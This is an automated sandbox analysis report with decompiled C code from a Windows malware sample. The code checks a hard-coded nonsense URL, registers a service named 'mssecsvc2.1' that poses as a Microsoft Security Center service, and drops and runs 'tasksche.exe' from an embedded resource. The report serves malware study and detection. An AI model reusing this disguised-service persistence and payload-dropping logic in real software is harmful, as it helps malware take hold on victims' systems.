                                                                                              • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                                                              • __p___argc.MSVCRT ref: 004080A5
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                                                                                              • OpenServiceA.ADVAPI32(00000000,mssecsvc2.1,000F01FF,6FB7FB10,00000000,?,004081B2), ref: 004080DC
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                                                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.254757710.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.254744236.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254780318.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254787485.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254798373.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254832122.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254872672.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_mssecsvr.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                                                                                              • String ID: mssecsvc2.1
                                                                                              • API String ID: 4274534310-2839763450
                                                                                              • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                                                              • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                                                                                              • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                                                              • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:36.3%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:36
                                                                                              Total number of Limit Nodes:2

                                                                                              Callgraph

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 86%
                                                                                              			E00408090() {
                                                                                              				char* _v4;
                                                                                              				char* _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				struct _SERVICE_TABLE_ENTRY _v16;
                                                                                              				long _t6;
                                                                                              				int _t9;
                                                                                              				void* _t19;
                                                                                              				void* _t22;
                                                                                              
                                                                                              				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
                                                                                              				__imp____p___argc();
                                                                                              				_t26 =  *_t6 - 2;
                                                                                              				if( *_t6 >= 2) {
                                                                                              					_t19 = OpenSCManagerA(0, 0, 0xf003f);
                                                                                              					__eflags = _t19;
                                                                                              					if(_t19 != 0) {
                                                                                              						_t22 = OpenServiceA(_t19, "mssecsvc2.1", 0xf01ff);
                                                                                              						__eflags = _t22;
                                                                                              						if(_t22 != 0) {
                                                                                              							E00407FA0(_t22, 0x3c);
                                                                                              							CloseServiceHandle(_t22);
                                                                                              						}
                                                                                              						CloseServiceHandle(_t19);
                                                                                              					}
                                                                                              					_v16 = "mssecsvc2.1";
                                                                                              					_v12 = 0x408000;
                                                                                              					_v8 = 0;
                                                                                              					_v4 = 0;
                                                                                              					_t9 = StartServiceCtrlDispatcherA( &_v16); // executed
                                                                                              					return _t9;
                                                                                              				} else {
                                                                                              					return E00407F20(_t26);
                                                                                              				}
                                                                                              			}











                                                                                              0x0040809f
                                                                                              0x004080a5
                                                                                              0x004080ab
                                                                                              0x004080ae
                                                                                              0x004080c9
                                                                                              0x004080cb
                                                                                              0x004080cd
                                                                                              0x004080e8
                                                                                              0x004080ea
                                                                                              0x004080ec
                                                                                              0x004080f1
                                                                                              0x004080fa
                                                                                              0x004080fa
                                                                                              0x004080fd
                                                                                              0x00408100
                                                                                              0x00408105
                                                                                              0x0040810e
                                                                                              0x00408116
                                                                                              0x0040811e
                                                                                              0x00408126
                                                                                              0x00408130
                                                                                              0x004080b0
                                                                                              0x004080b8
                                                                                              0x004080b8

                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                                                              • __p___argc.MSVCRT ref: 004080A5
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                                                                                              • OpenServiceA.ADVAPI32(00000000,mssecsvc2.1,000F01FF,6FB7FB10,00000000,?,004081B2), ref: 004080DC
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                                                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.764676146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000007.00000002.764645875.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764748473.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764783031.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764823734.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764989096.000000000042E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.765009046.000000000042F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.765030422.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.765070994.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_400000_mssecsvr.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                                                                                              • String ID: mssecsvc2.1
                                                                                              • API String ID: 4274534310-2839763450
                                                                                              • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                                                              • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                                                                                              • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                                                              • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 71%
                                                                                              			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                                                              				CHAR* _v8;
                                                                                              				intOrPtr* _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				struct _STARTUPINFOA _v96;
                                                                                              				int _v100;
                                                                                              				char** _v104;
                                                                                              				int _v108;
                                                                                              				void _v112;
                                                                                              				char** _v116;
                                                                                              				intOrPtr* _v120;
                                                                                              				intOrPtr _v124;
                                                                                              				void* _t27;
                                                                                              				intOrPtr _t36;
                                                                                              				signed int _t38;
                                                                                              				int _t40;
                                                                                              				intOrPtr* _t41;
                                                                                              				intOrPtr _t42;
                                                                                              				intOrPtr _t49;
                                                                                              				intOrPtr* _t55;
                                                                                              				intOrPtr _t58;
                                                                                              				intOrPtr _t61;
                                                                                              
                                                                                              				_push(0xffffffff);
                                                                                              				_push(0x40a1a0);
                                                                                              				_push(0x409ba2);
                                                                                              				_push( *[fs:0x0]);
                                                                                              				 *[fs:0x0] = _t58;
                                                                                              				_v28 = _t58 - 0x68;
                                                                                              				_v8 = 0;
                                                                                              				__set_app_type(2);
                                                                                              				 *0x70f894 =  *0x70f894 | 0xffffffff;
                                                                                              				 *0x70f898 =  *0x70f898 | 0xffffffff;
                                                                                              				 *(__p__fmode()) =  *0x70f88c;
                                                                                              				 *(__p__commode()) =  *0x70f888;
                                                                                              				 *0x70f890 = _adjust_fdiv;
                                                                                              				_t27 = E00409BA1( *_adjust_fdiv);
                                                                                              				_t61 =  *0x431410; // 0x1
                                                                                              				if(_t61 == 0) {
                                                                                              					__setusermatherr(E00409B9E);
                                                                                              				}
                                                                                              				E00409B8C(_t27);
                                                                                              				_push(0x40b010);
                                                                                              				_push(0x40b00c);
                                                                                              				L00409B86();
                                                                                              				_v112 =  *0x70f884;
                                                                                              				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
                                                                                              				_push(0x40b008);
                                                                                              				_push(0x40b000); // executed
                                                                                              				L00409B86(); // executed
                                                                                              				_t55 =  *_acmdln;
                                                                                              				_v120 = _t55;
                                                                                              				if( *_t55 != 0x22) {
                                                                                              					while( *_t55 > 0x20) {
                                                                                              						_t55 = _t55 + 1;
                                                                                              						_v120 = _t55;
                                                                                              					}
                                                                                              				} else {
                                                                                              					do {
                                                                                              						_t55 = _t55 + 1;
                                                                                              						_v120 = _t55;
                                                                                              						_t42 =  *_t55;
                                                                                              					} while (_t42 != 0 && _t42 != 0x22);
                                                                                              					if( *_t55 == 0x22) {
                                                                                              						L6:
                                                                                              						_t55 = _t55 + 1;
                                                                                              						_v120 = _t55;
                                                                                              					}
                                                                                              				}
                                                                                              				_t36 =  *_t55;
                                                                                              				if(_t36 != 0 && _t36 <= 0x20) {
                                                                                              					goto L6;
                                                                                              				}
                                                                                              				_v96.dwFlags = 0;
                                                                                              				GetStartupInfoA( &_v96);
                                                                                              				if((_v96.dwFlags & 0x00000001) == 0) {
                                                                                              					_t38 = 0xa;
                                                                                              				} else {
                                                                                              					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                                                              				}
                                                                                              				_push(_t38);
                                                                                              				_push(_t55);
                                                                                              				_push(0);
                                                                                              				_push(GetModuleHandleA(0));
                                                                                              				_t40 = E00408140();
                                                                                              				_v108 = _t40;
                                                                                              				exit(_t40);
                                                                                              				_t41 = _v24;
                                                                                              				_t49 =  *((intOrPtr*)( *_t41));
                                                                                              				_v124 = _t49;
                                                                                              				_push(_t41);
                                                                                              				_push(_t49);
                                                                                              				L00409B80();
                                                                                              				return _t41;
                                                                                              			}
























                                                                                              0x00409a19
                                                                                              0x00409a1b
                                                                                              0x00409a20
                                                                                              0x00409a2b
                                                                                              0x00409a2c
                                                                                              0x00409a39
                                                                                              0x00409a3e
                                                                                              0x00409a43
                                                                                              0x00409a4a
                                                                                              0x00409a51
                                                                                              0x00409a64
                                                                                              0x00409a72
                                                                                              0x00409a7b
                                                                                              0x00409a80
                                                                                              0x00409a85
                                                                                              0x00409a8b
                                                                                              0x00409a92
                                                                                              0x00409a98
                                                                                              0x00409a99
                                                                                              0x00409a9e
                                                                                              0x00409aa3
                                                                                              0x00409aa8
                                                                                              0x00409ab2
                                                                                              0x00409acb
                                                                                              0x00409ad1
                                                                                              0x00409ad6
                                                                                              0x00409adb
                                                                                              0x00409ae8
                                                                                              0x00409aea
                                                                                              0x00409af0
                                                                                              0x00409b2c
                                                                                              0x00409b31
                                                                                              0x00409b32
                                                                                              0x00409b32
                                                                                              0x00409af2
                                                                                              0x00409af2
                                                                                              0x00409af2
                                                                                              0x00409af3
                                                                                              0x00409af6
                                                                                              0x00409af8
                                                                                              0x00409b03
                                                                                              0x00409b05
                                                                                              0x00409b05
                                                                                              0x00409b06
                                                                                              0x00409b06
                                                                                              0x00409b03
                                                                                              0x00409b09
                                                                                              0x00409b0d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409b13
                                                                                              0x00409b1a
                                                                                              0x00409b24
                                                                                              0x00409b39
                                                                                              0x00409b26
                                                                                              0x00409b26
                                                                                              0x00409b26
                                                                                              0x00409b3a
                                                                                              0x00409b3b
                                                                                              0x00409b3c
                                                                                              0x00409b44
                                                                                              0x00409b45
                                                                                              0x00409b4a
                                                                                              0x00409b4e
                                                                                              0x00409b54
                                                                                              0x00409b59
                                                                                              0x00409b5b
                                                                                              0x00409b5e
                                                                                              0x00409b5f
                                                                                              0x00409b60
                                                                                              0x00409b67

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.764676146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000007.00000002.764645875.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764748473.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764783031.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764823734.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764989096.000000000042E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.765009046.000000000042F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.765030422.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.765070994.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_400000_mssecsvr.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                              • String ID:
                                                                                              • API String ID: 801014965-0
                                                                                              • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                                                              • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                                                                                              • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                                                              • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 77%
                                                                                              			E00408140() {
                                                                                              				char* _v1;
                                                                                              				char* _v3;
                                                                                              				char* _v7;
                                                                                              				char* _v11;
                                                                                              				char* _v15;
                                                                                              				char* _v19;
                                                                                              				char* _v23;
                                                                                              				void _v80;
                                                                                              				char _v100;
                                                                                              				char* _t12;
                                                                                              				void* _t13;
                                                                                              				void* _t27;
                                                                                              
                                                                                              				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com", 0xe << 2);
                                                                                              				asm("movsb");
                                                                                              				_v23 = _t12;
                                                                                              				_v19 = _t12;
                                                                                              				_v15 = _t12;
                                                                                              				_v11 = _t12;
                                                                                              				_v7 = _t12;
                                                                                              				_v3 = _t12;
                                                                                              				_v1 = _t12;
                                                                                              				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
                                                                                              				_t27 = _t13;
                                                                                              				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
                                                                                              				_push(_t27);
                                                                                              				InternetCloseHandle(); // executed
                                                                                              				InternetCloseHandle(0);
                                                                                              				E00408090();
                                                                                              				return 0;
                                                                                              			}















                                                                                              0x00408155
                                                                                              0x00408157
                                                                                              0x00408158
                                                                                              0x0040815c
                                                                                              0x00408160
                                                                                              0x00408164
                                                                                              0x00408168
                                                                                              0x0040816c
                                                                                              0x00408177
                                                                                              0x0040817b
                                                                                              0x0040818e
                                                                                              0x00408194
                                                                                              0x0040819c
                                                                                              0x004081a7
                                                                                              0x004081ab
                                                                                              0x004081ad
                                                                                              0x004081b9

                                                                                              APIs
                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                                                                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 004081A7
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 004081AB
                                                                                                • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                                                                • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                                                                                              Strings
                                                                                              • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com, xrefs: 0040814A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.764676146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000007.00000002.764645875.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764748473.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764783031.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764823734.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764989096.000000000042E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.765009046.000000000042F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.765030422.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.765070994.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_400000_mssecsvr.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                                                                                              • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                                                                                              • API String ID: 774561529-2614457033
                                                                                              • Opcode ID: 0bbc0dabe610ff42f1f9ad6e85cc21407dd9b1b68127969cd029bea3a518856a
                                                                                              • Instruction ID: 3b8a91e0baa4f3639afdb349cfc438007093f0a6557163af6b5eb03d237fc32a
                                                                                              • Opcode Fuzzy Hash: 0bbc0dabe610ff42f1f9ad6e85cc21407dd9b1b68127969cd029bea3a518856a
                                                                                              • Instruction Fuzzy Hash: B3018671548310AEE310DF748D01B6B7BE9EF85710F01082EF984F72C0EAB59804876B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 100%
                                                                                              			E00407C40() {
                                                                                              				char _v260;
                                                                                              				void* _t15;
                                                                                              				void* _t17;
                                                                                              
                                                                                              				sprintf( &_v260, "%s -m security", 0x70f760);
                                                                                              				_t15 = OpenSCManagerA(0, 0, 0xf003f);
                                                                                              				if(_t15 == 0) {
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					_t17 = CreateServiceA(_t15, "mssecsvc2.1", "Microsoft Security Center (2.1) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
                                                                                              					if(_t17 != 0) {
                                                                                              						StartServiceA(_t17, 0, 0);
                                                                                              						CloseServiceHandle(_t17);
                                                                                              					}
                                                                                              					CloseServiceHandle(_t15);
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}






                                                                                              0x00407c56
                                                                                              0x00407c6e
                                                                                              0x00407c72
                                                                                              0x00407cd3
                                                                                              0x00407c74
                                                                                              0x00407ca7
                                                                                              0x00407cab
                                                                                              0x00407cb2
                                                                                              0x00407cb9
                                                                                              0x00407cb9
                                                                                              0x00407cbc
                                                                                              0x00407cc9
                                                                                              0x00407cc9

                                                                                              APIs
                                                                                              • sprintf.MSVCRT ref: 00407C56
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                                                                                              • CreateServiceA.ADVAPI32(00000000,mssecsvc2.1,Microsoft Security Center (2.1) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6FB7FB10,00000000), ref: 00407C9B
                                                                                              • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.764676146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000007.00000002.764645875.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764748473.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764783031.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764823734.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.764989096.000000000042E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.765009046.000000000042F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.765030422.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.765070994.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_400000_mssecsvr.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                                                                                              • String ID: %s -m security$Microsoft Security Center (2.1) Service$mssecsvc2.1
                                                                                              • API String ID: 3340711343-2450984573
                                                                                              • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                                                              • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                                                                                              • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                                                              • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 36 407ce0-407cfb GetModuleHandleW 37 407d01-407d43 GetProcAddress * 4 36->37 38 407f08-407f14 36->38 37->38 39 407d49-407d4f 37->39 39->38 40 407d55-407d5b 39->40 40->38 41 407d61-407d63 40->41 41->38 42 407d69-407d7e FindResourceA 41->42 42->38 43 407d84-407d8e LoadResource 42->43 43->38 44 407d94-407da1 LockResource 43->44 44->38 45 407da7-407db3 SizeofResource 44->45 45->38 46 407db9-407e4e sprintf * 2 MoveFileExA 45->46 46->38 48 407e54-407ef0 46->48 48->38 52 407ef2-407f01 48->52 52->38
                                                                                              C-Code - Quality: 36%
                                                                                              			E00407CE0() {
                                                                                              				void _v259;
                                                                                              				char _v260;
                                                                                              				void _v519;
                                                                                              				char _v520;
                                                                                              				char _v572;
                                                                                              				short _v592;
                                                                                              				intOrPtr _v596;
                                                                                              				void* _v608;
                                                                                              				void _v636;
                                                                                              				char _v640;
                                                                                              				intOrPtr _v644;
                                                                                              				intOrPtr _v648;
                                                                                              				intOrPtr _v652;
                                                                                              				char _v656;
                                                                                              				intOrPtr _v692;
                                                                                              				intOrPtr _v700;
                                                                                              				_Unknown_base(*)()* _t36;
                                                                                              				void* _t38;
                                                                                              				void* _t39;
                                                                                              				intOrPtr _t64;
                                                                                              				struct HINSTANCE__* _t104;
                                                                                              				struct HRSRC__* _t105;
                                                                                              				void* _t107;
                                                                                              				void* _t108;
                                                                                              				long _t109;
                                                                                              				intOrPtr _t121;
                                                                                              				intOrPtr _t122;
                                                                                              
                                                                                              				_t104 = GetModuleHandleW(L"kernel32.dll");
                                                                                              				if(_t104 != 0) {
                                                                                              					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
                                                                                              					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
                                                                                              					 *0x431460 = GetProcAddress(_t104, "WriteFile");
                                                                                              					_t36 = GetProcAddress(_t104, "CloseHandle");
                                                                                              					_t64 =  *0x431478; // 0x0
                                                                                              					 *0x43144c = _t36;
                                                                                              					if(_t64 != 0) {
                                                                                              						_t121 =  *0x431458; // 0x0
                                                                                              						if(_t121 != 0) {
                                                                                              							_t122 =  *0x431460; // 0x0
                                                                                              							if(_t122 != 0 && _t36 != 0) {
                                                                                              								_t105 = FindResourceA(0, 0x727, "R");
                                                                                              								if(_t105 != 0) {
                                                                                              									_t38 = LoadResource(0, _t105);
                                                                                              									if(_t38 != 0) {
                                                                                              										_t39 = LockResource(_t38);
                                                                                              										_v608 = _t39;
                                                                                              										if(_t39 != 0) {
                                                                                              											_t109 = SizeofResource(0, _t105);
                                                                                              											if(_t109 != 0) {
                                                                                              												_v520 = 0;
                                                                                              												memset( &_v519, 0, 0x40 << 2);
                                                                                              												asm("stosw");
                                                                                              												asm("stosb");
                                                                                              												_v260 = 0;
                                                                                              												memset( &_v259, 0, 0x40 << 2);
                                                                                              												asm("stosw");
                                                                                              												asm("stosb");
                                                                                              												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
                                                                                              												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
                                                                                              												MoveFileExA( &_v520,  &_v260, 1);
                                                                                              												_t107 =  *0x431458( &_v520, 0x40000000, 0, 0, 2, 4, 0);
                                                                                              												if(_t107 != 0xffffffff) {
                                                                                              													 *0x431460(_t107, _v636, _t109,  &_v636, 0);
                                                                                              													 *0x43144c(_t107);
                                                                                              													_v652 = 0;
                                                                                              													_v648 = 0;
                                                                                              													_v644 = 0;
                                                                                              													memset( &_v636, 0, 0x10 << 2);
                                                                                              													asm("repne scasb");
                                                                                              													_v656 = 0;
                                                                                              													_t108 = " /i";
                                                                                              													asm("repne scasb");
                                                                                              													memcpy( &_v572 - 1, _t108, 0 << 2);
                                                                                              													_push( &_v656);
                                                                                              													memcpy(_t108 + 0x175b75a, _t108, 0);
                                                                                              													_push( &_v640);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(0x8000000);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push( &_v572);
                                                                                              													_push(0);
                                                                                              													_v640 = 0x44;
                                                                                              													_v592 = 0;
                                                                                              													_v596 = 0x81;
                                                                                              													if( *0x431478() != 0) {
                                                                                              														 *0x43144c(_v692);
                                                                                              														 *0x43144c(_v700);
                                                                                              													}
                                                                                              												}
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}






























                                                                                              0x00407cf5
                                                                                              0x00407cfb
                                                                                              0x00407d15
                                                                                              0x00407d22
                                                                                              0x00407d2f
                                                                                              0x00407d34
                                                                                              0x00407d36
                                                                                              0x00407d3c
                                                                                              0x00407d43
                                                                                              0x00407d49
                                                                                              0x00407d4f
                                                                                              0x00407d55
                                                                                              0x00407d5b
                                                                                              0x00407d7a
                                                                                              0x00407d7e
                                                                                              0x00407d86
                                                                                              0x00407d8e
                                                                                              0x00407d95
                                                                                              0x00407d9d
                                                                                              0x00407da1
                                                                                              0x00407daf
                                                                                              0x00407db3
                                                                                              0x00407dc4
                                                                                              0x00407dc8
                                                                                              0x00407dca
                                                                                              0x00407dcc
                                                                                              0x00407ddb
                                                                                              0x00407de2
                                                                                              0x00407def
                                                                                              0x00407df1
                                                                                              0x00407e01
                                                                                              0x00407e18
                                                                                              0x00407e2c
                                                                                              0x00407e49
                                                                                              0x00407e4e
                                                                                              0x00407e61
                                                                                              0x00407e68
                                                                                              0x00407e72
                                                                                              0x00407e7a
                                                                                              0x00407e82
                                                                                              0x00407e8b
                                                                                              0x00407e95
                                                                                              0x00407e9b
                                                                                              0x00407e9f
                                                                                              0x00407ea8
                                                                                              0x00407eb0
                                                                                              0x00407ebb
                                                                                              0x00407ebc
                                                                                              0x00407ec6
                                                                                              0x00407ec7
                                                                                              0x00407ec8
                                                                                              0x00407ec9
                                                                                              0x00407ece
                                                                                              0x00407ecf
                                                                                              0x00407ed0
                                                                                              0x00407ed1
                                                                                              0x00407ed2
                                                                                              0x00407ed3
                                                                                              0x00407edb
                                                                                              0x00407ee0
                                                                                              0x00407ef0
                                                                                              0x00407ef7
                                                                                              0x00407f02
                                                                                              0x00407f02
                                                                                              0x00407ef0
                                                                                              0x00407e4e
                                                                                              0x00407db3
                                                                                              0x00407da1
                                                                                              0x00407d8e
                                                                                              0x00407d7e
                                                                                              0x00407d5b
                                                                                              0x00407d4f
                                                                                              0x00407d43
                                                                                              0x00407f14

                                                                                              APIs
